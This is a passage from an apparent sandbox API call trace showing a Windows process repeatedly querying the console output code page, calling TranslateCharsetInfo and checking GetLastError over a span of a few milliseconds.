lpCs=0x5dcea60) returned 0 [0160.209] GetLastError () returned 0xcb [0160.209] GetConsoleOutputCP () returned 0x1b5 [0160.209] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.209] GetLastError () returned 0xcb [0160.209] GetConsoleOutputCP () returned 0x1b5 [0160.209] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.209] GetLastError () returned 0xcb [0160.209] GetConsoleOutputCP () returned 0x1b5 [0160.209] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.209] GetLastError () returned 0xcb [0160.209] GetConsoleOutputCP () returned 0x1b5 [0160.209] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.210] GetLastError () returned 0xcb [0160.210] GetConsoleOutputCP () returned 0x1b5 [0160.210] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.210] GetLastError () returned 0xcb [0160.210] GetConsoleOutputCP () returned 0x1b5 [0160.210] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.210] GetLastError () returned 0xcb [0160.210] GetConsoleOutputCP () returned 0x1b5 [0160.210] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.210] GetLastError () returned 0xcb [0160.210] GetConsoleOutputCP () returned 0x1b5 [0160.210] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.210] GetLastError () returned 0xcb [0160.210] GetConsoleOutputCP () returned 0x1b5 [0160.210] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.210] GetLastError () returned 0xcb [0160.210] GetConsoleOutputCP () returned 0x1b5 [0160.211] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.211] GetLastError () returned 0xcb [0160.211] GetConsoleOutputCP () returned 0x1b5 [0160.211] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.211] GetLastError () returned 0xcb [0160.211] GetConsoleOutputCP () returned 0x1b5 [0160.211] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.211] GetLastError () returned 0xcb [0160.211] GetConsoleOutputCP () returned 0x1b5 [0160.211] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.211] GetLastError () returned 0xcb [0160.211] GetConsoleOutputCP () returned 0x1b5 [0160.211] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.211] GetLastError () returned 0xcb [0160.211] GetConsoleOutputCP () returned 0x1b5 [0160.211] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.211] GetLastError () returned 0xcb [0160.212] GetConsoleOutputCP () returned 0x1b5 [0160.212] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.212] GetLastError () returned 0xcb [0160.212] GetConsoleOutputCP () returned 0x1b5 [0160.212] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.212] GetLastError () returned 0xcb [0160.212] GetConsoleOutputCP () returned 0x1b5 [0160.212] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.212] GetLastError () returned 0xcb [0160.212] GetConsoleOutputCP () returned 0x1b5 [0160.212] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.212] GetLastError () returned 0xcb [0160.212] GetConsoleOutputCP () returned 0x1b5 [0160.212] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.212] GetLastError () returned 0xcb [0160.212] GetConsoleOutputCP () returned 0x1b5 [0160.213] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.213] GetLastError () returned 0xcb [0160.213] GetConsoleOutputCP () returned 0x1b5 [0160.213] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.213] GetLastError () returned 0xcb [0160.213] GetConsoleOutputCP () returned 0x1b5 [0160.213] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.213] GetLastError () returned 0xcb [0160.213] GetConsoleOutputCP () returned 0x1b5 [0160.213] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.213] GetLastError () returned 0xcb [0160.213] GetConsoleOutputCP () returned 0x1b5 [0160.213] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.213] GetLastError () returned 0xcb [0160.213] GetConsoleOutputCP () returned 0x1b5 [0160.214] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.214] GetLastError () returned 0xcb [0160.214] GetConsoleOutputCP () returned 0x1b5 [0160.214] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.214] GetLastError () returned 0xcb [0160.214] GetConsoleOutputCP () returned 0x1b5 [0160.214] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.214] GetLastError () returned 0xcb [0160.214] GetConsoleOutputCP () returned 0x1b5 [0160.214] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.214] GetLastError () returned 0xcb [0160.214] GetConsoleOutputCP () returned 0x1b5 [0160.214] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.214] GetLastError () returned 0xcb [0160.214] GetConsoleOutputCP () returned 0x1b5 [0160.214] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.214] GetLastError () returned 0xcb [0160.214] GetConsoleOutputCP () returned 0x1b5 [0160.215] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.215] GetLastError () returned 0xcb [0160.215] GetConsoleOutputCP () returned 0x1b5 [0160.215] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.215] GetLastError () returned 0xcb [0160.215] GetConsoleOutputCP () returned 0x1b5 [0160.215] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.215] GetLastError () returned 0xcb [0160.215] GetConsoleOutputCP () returned 0x1b5 [0160.215] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.215] GetLastError () returned 0xcb [0160.215] GetConsoleOutputCP () returned 0x1b5 [0160.215] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.215] GetLastError () returned 0xcb [0160.215] GetConsoleOutputCP () returned 0x1b5 [0160.216] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.216] GetLastError () returned 0xcb [0160.216] GetConsoleOutputCP () returned 0x1b5 [0160.216] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.216] GetLastError () returned 0xcb [0160.216] GetConsoleOutputCP () returned 0x1b5 [0160.216] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.216] GetLastError () returned 0xcb [0160.216] GetConsoleOutputCP () returned 0x1b5 [0160.216] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.216] GetLastError () returned 0xcb [0160.216] GetConsoleOutputCP () returned 0x1b5 [0160.216] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.216] GetLastError () returned 0xcb [0160.216] GetConsoleOutputCP () returned 0x1b5 [0160.217] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.217] GetLastError () returned 0xcb [0160.217] GetConsoleOutputCP () returned 0x1b5 [0160.217] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.217] GetLastError () returned 0xcb [0160.217] GetConsoleOutputCP () returned 0x1b5 [0160.217] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.217] GetLastError () returned 0xcb [0160.217] GetConsoleOutputCP () returned 0x1b5 [0160.217] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.217] GetLastError () returned 0xcb [0160.217] GetConsoleOutputCP () returned 0x1b5 [0160.217] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.217] GetLastError () returned 0xcb [0160.217] GetConsoleOutputCP () returned 0x1b5 [0160.217] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.217] GetLastError () returned 0xcb [0160.217] GetConsoleOutputCP () returned 0x1b5 [0160.218] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.218] GetLastError () returned 0xcb [0160.218] GetConsoleOutputCP () returned 0x1b5 [0160.218] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.218] GetLastError () returned 0xcb [0160.218] GetConsoleOutputCP () returned 0x1b5 [0160.218] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.218] GetLastError () returned 0xcb [0160.218] GetConsoleOutputCP () returned 0x1b5 [0160.218] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.218] GetLastError () returned 0xcb [0160.218] GetConsoleOutputCP () returned 0x1b5 [0160.218] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.218] GetLastError () returned 0xcb [0160.218] GetConsoleOutputCP () returned 0x1b5 [0160.219] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.219] GetLastError () returned 0xcb [0160.219] GetConsoleOutputCP () returned 0x1b5 [0160.219] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.219] GetLastError () returned 0xcb [0160.219] GetConsoleOutputCP () returned 0x1b5 [0160.219] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.219] GetLastError () returned 0xcb [0160.219] GetConsoleOutputCP () returned 0x1b5 [0160.219] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.219] GetLastError () returned 0xcb [0160.219] GetConsoleOutputCP () returned 0x1b5 [0160.219] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.219] GetLastError () returned 0xcb [0160.219] GetConsoleOutputCP () returned 0x1b5 [0160.219] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.219] GetLastError () returned 0xcb [0160.219] GetConsoleOutputCP () returned 0x1b5 [0160.220] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.220] GetLastError () returned 0xcb [0160.220] GetConsoleOutputCP () returned 0x1b5 [0160.220] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.220] GetLastError () returned 0xcb [0160.220] GetConsoleOutputCP () returned 0x1b5 [0160.220] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.220] GetLastError () returned 0xcb [0160.220] GetConsoleOutputCP () returned 0x1b5 [0160.220] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.220] GetLastError () returned 0xcb [0160.220] GetConsoleOutputCP () returned 0x1b5 [0160.220] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.220] GetLastError () returned 0xcb [0160.220] GetConsoleOutputCP () returned 0x1b5 [0160.221] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.221] GetLastError () returned 0xcb [0160.221] GetConsoleOutputCP () returned 0x1b5 [0160.221] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.221] GetLastError () returned 0xcb [0160.221] GetConsoleOutputCP () returned 0x1b5 [0160.221] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.221] GetLastError () returned 0xcb [0160.221] GetConsoleOutputCP () returned 0x1b5 [0160.221] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.221] GetLastError () returned 0xcb [0160.221] GetConsoleOutputCP () returned 0x1b5 [0160.221] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.221] GetLastError () returned 0xcb [0160.221] GetConsoleOutputCP () returned 0x1b5 [0160.221] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.221] GetLastError () returned 0xcb [0160.221] GetConsoleOutputCP () returned 0x1b5 [0160.222] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.222] GetLastError () returned 0xcb [0160.222] GetConsoleOutputCP () returned 0x1b5 [0160.222] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.222] GetLastError () returned 0xcb [0160.222] GetConsoleOutputCP () returned 0x1b5 [0160.223] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.223] GetLastError () returned 0xcb [0160.223] GetConsoleOutputCP () returned 0x1b5 [0160.223] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.223] GetLastError () returned 0xcb [0160.223] GetConsoleOutputCP () returned 0x1b5 [0160.223] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.223] GetLastError () returned 0xcb [0160.223] GetConsoleOutputCP () returned 0x1b5 [0160.223] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.223] GetLastError () returned 0xcb [0160.223] GetConsoleOutputCP () returned 0x1b5 [0160.223] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.223] GetLastError () returned 0xcb [0160.223] GetConsoleOutputCP () returned 0x1b5 [0160.223] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.223] GetLastError () returned 0xcb [0160.223] GetConsoleOutputCP () returned 0x1b5 [0160.224] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.224] GetLastError () returned 0xcb [0160.224] GetConsoleOutputCP () returned 0x1b5 [0160.224] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.224] GetLastError () returned 0xcb [0160.224] GetConsoleOutputCP () returned 0x1b5 [0160.224] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.224] GetLastError () returned 0xcb [0160.224] GetConsoleOutputCP () returned 0x1b5 [0160.224] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.224] GetLastError () returned 0xcb [0160.224] GetConsoleOutputCP () returned 0x1b5 [0160.224] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.224] GetLastError () returned 0xcb [0160.224] GetConsoleOutputCP () returned 0x1b5 [0160.225] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.225] GetLastError () returned 0xcb [0160.225] GetConsoleOutputCP () returned 0x1b5 [0160.225] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.225] GetLastError () returned 0xcb [0160.225] GetConsoleOutputCP () returned 0x1b5 [0160.225] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.225] GetLastError () returned 0xcb [0160.225] GetConsoleOutputCP () returned 0x1b5 [0160.225] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.225] GetLastError () returned 0xcb [0160.225] GetConsoleOutputCP () returned 0x1b5 [0160.225] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.225] GetLastError () returned 0xcb [0160.225] GetConsoleOutputCP () returned 0x1b5 [0160.225] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.225] GetLastError () returned 0xcb [0160.225] GetConsoleOutputCP () returned 0x1b5 [0160.226] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.226] GetLastError () returned 0xcb [0160.226] GetConsoleOutputCP () returned 0x1b5 [0160.226] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.226] GetLastError () returned 0xcb [0160.226] GetConsoleOutputCP () returned 0x1b5 [0160.226] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.226] GetLastError () returned 0xcb [0160.226] GetConsoleOutputCP () returned 0x1b5 [0160.226] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.226] GetLastError () returned 0xcb [0160.226] GetConsoleOutputCP () returned 0x1b5 [0160.226] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.226] GetLastError () returned 0xcb [0160.226] GetConsoleOutputCP () returned 0x1b5 [0160.226] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.226] GetLastError () returned 0xcb [0160.226] GetConsoleOutputCP () returned 0x1b5 [0160.227] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.227] GetLastError () returned 0xcb [0160.227] GetConsoleOutputCP () returned 0x1b5 [0160.227] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.227] GetLastError () returned 0xcb [0160.227] GetConsoleOutputCP () returned 0x1b5 [0160.227] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.227] GetLastError () returned 0xcb [0160.227] GetConsoleOutputCP () returned 0x1b5 [0160.227] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.227] GetLastError () returned 0xcb [0160.227] GetConsoleOutputCP () returned 0x1b5 [0160.227] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.227] GetLastError () returned 0xcb [0160.227] GetConsoleOutputCP () returned 0x1b5 [0160.228] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.228] GetLastError () returned 0xcb [0160.228] GetConsoleOutputCP () returned 0x1b5 [0160.228] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.228] GetLastError () returned 0xcb [0160.228] GetConsoleOutputCP () returned 0x1b5 [0160.228] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.228] GetLastError () returned 0xcb [0160.228] GetConsoleOutputCP () returned 0x1b5 [0160.228] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.228] GetLastError () returned 0xcb [0160.228] GetConsoleOutputCP () returned 0x1b5 [0160.228] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.228] GetLastError () returned 0xcb [0160.228] GetConsoleOutputCP () returned 0x1b5 [0160.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.229] GetLastError () returned 0xcb [0160.229] GetConsoleOutputCP () returned 0x1b5 [0160.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.229] GetLastError () returned 0xcb [0160.229] GetConsoleOutputCP () returned 0x1b5 [0160.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.229] GetLastError () returned 0xcb [0160.229] GetConsoleOutputCP () returned 0x1b5 [0160.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.229] GetLastError () returned 0xcb [0160.229] GetConsoleOutputCP () returned 0x1b5 [0160.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.229] GetLastError () returned 0xcb [0160.229] GetConsoleOutputCP () returned 0x1b5 [0160.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.229] GetLastError () returned 0xcb [0160.229] GetConsoleOutputCP () returned 0x1b5 [0160.230] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.230] GetLastError () returned 0xcb [0160.230] GetConsoleOutputCP () returned 0x1b5 [0160.230] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: 